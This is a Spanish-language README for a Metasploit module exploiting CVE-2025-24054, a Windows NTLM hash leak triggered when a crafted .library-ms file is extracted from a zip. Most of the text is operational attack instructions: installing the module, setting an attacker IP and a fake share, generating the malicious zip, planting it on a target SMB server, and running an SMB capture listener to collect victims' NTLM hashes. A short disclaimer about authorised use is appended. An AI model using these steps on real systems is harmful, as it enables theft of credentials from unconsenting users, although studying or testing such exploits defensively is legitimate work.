
Metasploit module to exploit CVE-2025-24054 (formerly 24071). NTLM leak exploit integrated into Metasploit for attack vectors based on Windows libraries.
La vulnerabilidad ocurre durante el proceso de extracción de un archivo .zip Al interactuar con un archivo .library-ms especialmente diseñado, el Explorador de Windows procesa el esquema XML interno e inicia automáticamente una solicitud de autenticación SMB hacia una ruta remota controlada por el atacante.
Este comportamiento permite la exfiltración del hash NTLM del usuario sin requerir interacción adicional más allá de la descompresión del archivo. Para ver una prueba de concepto te recomiendo visitar el siguiente link: Fluffy - HTB.
Aunque originalmente esta vulnerabilidad fue difundida como CVE-2025-24071, actualmente se rastrea oficialmente como CVE-2025-24054.
Clonar el repositorio:
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071
Copiar el módulo al directorio de Metasploit:
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
Si el directorio no existe, crealo con:
❯ mkdir -p ~/.msf4/modules/auxiliary/server/
Luego copiar nuevamente el módulo.
Iniciar Metasploit y cargar el módulo:
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak
Si el modulo cargo correctamente podras ver las opciones para configurarlo:
❯ show options
Module options (auxiliary/server/ntlm_hash_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACKER_IP yes IP del atacante (donde corre Responder/Impacket)
FILENAME exploit.zip yes El nombre del archivo ZIP
LIBRARY_NAME documents.library-ms yes Nombre del archivo .library-ms
SHARE_NAME recurso yes Nombre del recurso compartido ficticio
Configura el modulo y ejecuta:
❯ set ATTACKER_IP 0.0.0.0 # Reemplaza con tu IP atacante
❯ set FILENAME exploit.zip # Nombre del payload que subiras al SMB (equipo objetivo)
❯ set LIBRARY_NAME malicious.library-ms # Nombre de .library-ms file
❯ set SHARE_NAME it_shared # Nombre del recurso SMB
❯ run
Output: el módulo genera un archivo .zip que debe ser subido al servidor SMB objetivo para su posterior ejecución por parte de la víctima
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed
Por ultimo utilice el módulo de captura SMB de Metasploit para recibir los hashes NTLM:
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0 # Reemplaza con tu IP atacante
❯ run
Si tienes problemas para levantar el servidor SMB desde Metasploit:
Este módulo fue desarrollado con fines educativos y de pruebas autorizadas únicamente. El uso no autorizado de este tipo de herramientas puede ser ilegal.
Security Layer